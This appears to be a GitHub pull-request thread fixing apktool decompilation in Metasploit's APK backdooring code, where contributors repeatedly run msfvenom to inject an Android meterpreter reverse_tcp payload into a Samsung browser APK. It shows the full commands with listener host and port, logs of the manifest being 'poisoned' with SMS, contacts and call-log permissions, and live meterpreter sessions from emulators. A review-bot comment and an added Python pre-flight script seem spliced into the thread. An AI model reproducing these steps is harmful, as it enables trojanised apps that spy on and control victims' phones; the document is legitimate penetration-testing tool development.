
Msf::Payload::Apk: apktool: Decompile only main classes #17673

Merged

Conversation

bcoles
Contributor

@bcoles bcoles commented Feb 20, 2023

@timwr

Fixes #17631

Tested using:

I've tested that these changes allow the APK to be decompiled and rebuilt successfully, but haven't done any further testing (does the payload still work? is there any reason why we would ever want to decompile other DEX files?).

Before

# bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.0.0/stringio.so: warning: already initialized constant StringIO::VERSION
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[-] I: Using Apktool 2.7.0 on original.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Baksmaling assets/A3AEECD8.dex...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_tab_n_badge_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_action_bar_background_divider_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_section_divider_default_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-desk-mdpi-v8/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-tvdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
Exception in thread "main" org.jf.dexlib2.dexbacked.DexBackedDexFile$NotADexFile: Not a valid dex magic value: cf 77 4c c7 9b 21 01 cd
	at org.jf.dexlib2.util.DexUtil.verifyDexHeader(DexUtil.java:93)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.getVersion(DexBackedDexFile.java:157)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:81)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:184)
	at org.jf.dexlib2.dexbacked.ZipDexContainer$1.getDexFile(ZipDexContainer.java:181)
	at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:89)
	at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:37)
	at brut.androlib.Androlib.decodeSourcesSmali(Androlib.java:103)
	at brut.androlib.ApkDecoder.decode(ApkDecoder.java:151)
	at brut.apktool.Main.cmdDecode(Main.java:175)
	at brut.apktool.Main.main(Main.java:79)
Error: apktool execution failed

After

# bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.0.0/stringio.so: warning: already initialized constant StringIO::VERSION
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.sec.android.app.sbrowser.husvm
[*] Loading /tmp/d20230220-2705253-uvqwjj/original/smali/com/sec/android/app/sbrowser/SBrowserApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230220-2705253-uvqwjj/output.apk
[*] Aligning /tmp/d20230220-2705253-uvqwjj/output.apk
[*] Signing /tmp/d20230220-2705253-uvqwjj/aligned.apk with apksigner
Payload size: 76491245 bytes
Saved as: asdf.apk

@@ -295,7 +295,7 @@ def backdoor_apk(apkfile, raw_payload, signature = true, manifest = true, apk_da
end

print_status "Decompiling original APK..\n"
apktool_output = run_cmd(['apktool', 'd', "#{tempdir}/original.apk", '-o', "#{tempdir}/original"])
apktool_output = run_cmd(['apktool', 'd', "#{tempdir}/original.apk", '--only-main-classes', '-o', "#{tempdir}/original"])
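Review bot: the new `--only-main-classes` argument on the `apktool d` line is not covered by the apktool version gate elsewhere in this file, which still accepts anything from 2.0.1 upwards; an apktool older than the first release that supports the flag (2.4.1 per the discussion below) will reject the command line with an unknown-option error instead of the existing "not supported, please download at least version" message, so the `Rex::Version.new('2.0.1')` minimum should be raised in the same change. A one-line comment above the call explaining why the flag is there would also help future readers: the "Before" output shows the default decode baksmaling `assets/A3AEECD8.dex` and aborting with "Not a valid dex magic value", and restricting disassembly to the root `classes*.dex` files is what lets that entry pass through untouched.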
Contributor

Not a blocker. A question that comes to mind is: what versions of apktool support this flag?

Contributor Author

The flag has been supported since at least Nov 16, 2019. The flag was available prior, but had some bugs. (iBotPeaches/Apktool#2226)

Version 2.4.1 was released not long after (Nov 30, 2019) and should support this flag:

https://github.com/iBotPeaches/Apktool/releases/tag/v2.4.1

Metasploit requires apktool version 2.0.1 at minimum and raises a warning for version 2.5.1 and prior.

# Parse the first line of `apktool --version` into a comparable version object
apk_v = Rex::Version.new(check_apktool.split("\n").first.strip)
# Hard floor: refuse to run with anything older than 2.0.1
unless apk_v >= Rex::Version.new('2.0.1')
  raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
end
# Soft floor: warn, but continue, for versions below 2.5.1
unless apk_v >= Rex::Version.new('2.5.1')
  print_warning("apktool version #{apk_v} is outdated and may fail to decompile some apk files. Update apktool to the latest version.")
end

This change requires the minimum version to be bumped to 2.4.1.
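
A pre-flight check covering both points raised in this thread (the apktool version gate, and the `assets/A3AEECD8.dex` entry whose header is not a DEX header), as an added example that is not part of this PR, of Metasploit, or of apktool. It assumes apktool's documented behaviour that `--only-main-classes` limits disassembly to `classes.dex`, `classes2.dex`, ... at the archive root; the sample APK it builds in memory is constructed for the example and reuses the eight bytes from the "Not a valid dex magic value" message. The function and constant names (`classify`, `MIN_VERSION`, `WARN_BELOW`) are the example's own.

```python
"""Pre-flight checks for an APK template before handing it to apktool.

Added example, not Metasploit or apktool code: (1) mirrors the apktool version
gate with plain tuple comparison, and (2) walks the zip entries of an APK to
find *.dex entries whose header is not a DEX header, which is what made the
default decode abort on assets/A3AEECD8.dex in the thread above.
"""
import io
import re
import zipfile

# A DEX header starts with "dex\n", a three-digit version and a NUL byte.
DEX_MAGIC = re.compile(rb"\Adex\n\d{3}\x00")
# --only-main-classes restricts baksmali to classes.dex, classes2.dex, ...
# at the archive root (assumption from apktool's documented behaviour).
MAIN_CLASSES = re.compile(r"\Aclasses\d*\.dex\Z")

MIN_VERSION = (2, 4, 1)   # first release where --only-main-classes works
WARN_BELOW = (2, 7, 0)    # older builds are known to choke on some APKs


def parse_apktool_version(output):
    """Turn the first line of `apktool --version` output into an int tuple."""
    lines = output.strip().splitlines()
    first = lines[0].strip() if lines else ""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", first)
    if not m:
        raise ValueError(f"unrecognised apktool version: {first!r}")
    return tuple(int(x) for x in m.groups())


def apktool_decode_cmd(version, apk_path, out_dir):
    """Build the decode argv; refuse versions that lack the flag.
    Returns (argv, warn) where warn is True for versions below WARN_BELOW."""
    if version < MIN_VERSION:
        raise RuntimeError(
            f"apktool {'.'.join(map(str, version))} not supported, need >= 2.4.1")
    argv = ["apktool", "d", apk_path, "--only-main-classes", "-o", out_dir]
    return argv, version < WARN_BELOW


def scan_dex_entries(apk_bytes):
    """Return [(entry name, is main classes, header is DEX)] for every *.dex."""
    found = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".dex"):
                continue
            with zf.open(info) as fh:
                head = fh.read(8)   # only the magic is needed
            found.append((info.filename,
                          bool(MAIN_CLASSES.match(info.filename)),
                          bool(DEX_MAGIC.match(head))))
    return found


def classify(apk_bytes):
    """'ok': default decode is safe. 'needs_flag': only non-main *.dex entries
    are bogus, so --only-main-classes avoids them. 'broken': a root
    classes*.dex is itself not a DEX file, which the flag cannot fix."""
    entries = scan_dex_entries(apk_bytes)
    if any(main and not ok for _, main, ok in entries):
        return "broken"
    if any(not main and not ok for _, main, ok in entries):
        return "needs_flag"
    return "ok"


def build_sample_apk(corrupt_main=False):
    """Constructed stand-in for the browser APK: two root dex entries plus an
    assets/*.dex entry carrying the exact bytes apktool complained about."""
    dex_header = b"dex\n035\x00" + b"\x00" * 24
    bogus = bytes.fromhex("cf774cc79b2101cd") + b"\x00" * 24
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", bogus if corrupt_main else dex_header)
        zf.writestr("classes2.dex", dex_header)
        zf.writestr("assets/A3AEECD8.dex", bogus)
    return buf.getvalue()


if __name__ == "__main__":
    apk = build_sample_apk()
    for name, main, ok in scan_dex_entries(apk):
        print(f"{name:24} main={main!s:5} dex_magic={ok}")
    print("verdict:", classify(apk))
    ver = parse_apktool_version("2.7.0\n")
    print(apktool_decode_cmd(ver, "original.apk", "original"))
```

Running it on a real template is a matter of `classify(open(path, "rb").read())`; a "broken" verdict tells you in advance that the flag will not save the decode, which is the case the thread's tests did not cover.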

Contributor Author

Updated minimum required version to 2.4.1.

@bcoles bcoles force-pushed the payload-apk-apktool-only-main-classes branch from 1842ed4 to b19ab03 Compare February 24, 2023 14:09
@gwillcox-r7 gwillcox-r7 self-assigned this Mar 6, 2023
@gwillcox-r7
Contributor

Before:

 ~/git/metasploit-framework │ master ?31  bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[-] I: Using Apktool 2.7.0 on original.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/gwillcox/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Baksmaling assets/A3AEECD8.dex...
W: Cant find 9patch chunk in file: "drawable-desk-mdpi-v8/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_section_divider_default_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_tab_n_badge_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-tvdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_action_bar_background_divider_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
Exception in thread "main" org.jf.dexlib2.dexbacked.DexBackedDexFile$NotADexFile: Not a valid dex magic value: cf 77 4c c7 9b 21 01 cd
        at org.jf.dexlib2.util.DexUtil.verifyDexHeader(DexUtil.java:93)
        at org.jf.dexlib2.dexbacked.DexBackedDexFile.getVersion(DexBackedDexFile.java:157)
        at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:81)
        at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:184)
        at org.jf.dexlib2.dexbacked.ZipDexContainer$1.getDexFile(ZipDexContainer.java:181)
        at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:89)
        at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:37)
        at brut.androlib.Androlib.decodeSourcesSmali(Androlib.java:103)
        at brut.androlib.ApkDecoder.decode(ApkDecoder.java:151)
        at brut.apktool.Main.cmdDecode(Main.java:175)
        at brut.apktool.Main.main(Main.java:79)
Error: apktool execution failed

@gwillcox-r7
Contributor

For what it's worth, the application appears to be resigned with the backdoor and I can successfully install the application on a target device, and the app operates successfully, though I haven't confirmed if the reverse shell works successfully, which may be in part due to me not setting up the TCP port forwards correctly. Good to know it isn't affecting the app's install though.

@gwillcox-r7 gwillcox-r7 removed their assignment Mar 6, 2023
@bcoles
Contributor Author

bcoles commented Mar 7, 2023

Tested successfully in emulator on Pixel_4_API_30. Installed and received a session.

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : localhost
OS              : Android 11 - Linux 5.4.61-android11-0-00791-gbad091cc4bf3-ab6833933 (armv7l)
Architecture    : armv7l
System Language : en_US
Meterpreter     : dalvik/android
meterpreter > getuid
Server username: u0_a156
meterpreter > pwd
/data/user/0/com.sec.android.app.sbrowser/files

I tried a few other devices in emulator, but installation failed. I'm fairly sure that's to do with this specific APK, and not due to the changes introduced in this PR.

I also tested com.dotgears.flappybird.apk in emulator on Nexus_10_API_31 and verified that the changes did not break injection with this APK. This is a known good APK I've used to test msfvenom APK injection on emulated devices previously.

msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : localhost
OS              : Android 11 - Linux 5.4.61-android11-0-00791-gbad091cc4bf3-ab6833933 (i686)
Architecture    : x86
System Language : en_US
Meterpreter     : dalvik/android
meterpreter > getuid
Server username: u0_a154
meterpreter > pwd
/data/user/0/com.dotgears.flappybird/files

@gwillcox-r7
Contributor

gwillcox-r7 commented Mar 7, 2023

Alright given all the information that has been posted to this thread and the tests that have been conducted so far, I think this should be good to land. If we need to roll this back later we can always do so should things suddenly start breaking on edge cases or similar, but given tests above I'm fairly confident that this should be okay in its current state.

@gwillcox-r7 gwillcox-r7 self-assigned this Mar 7, 2023
@gwillcox-r7 gwillcox-r7 added the rn-fix release notes fix label Mar 7, 2023
@gwillcox-r7 gwillcox-r7 merged commit 10af603 into rapid7:master Mar 7, 2023
@gwillcox-r7
Contributor

Release Notes

lib/msf/core/payload/apk.rb has been updated so that by default it only decompiles the main classes instead of all classes, fixing some issues whereby decompiling all classes would prevent creation of a backdoored APK. This also bumps up the minimum apktool version to 2.4.1 and makes it so that versions prior to 2.7.0 of apktool will throw a warning about being potentially out of date.

@bcoles bcoles deleted the payload-apk-apktool-only-main-classes branch March 8, 2023 00:05
Successfully merging this pull request may close these issues.

APKTOOL excecution failed: Not a valid dex magic value
3 participants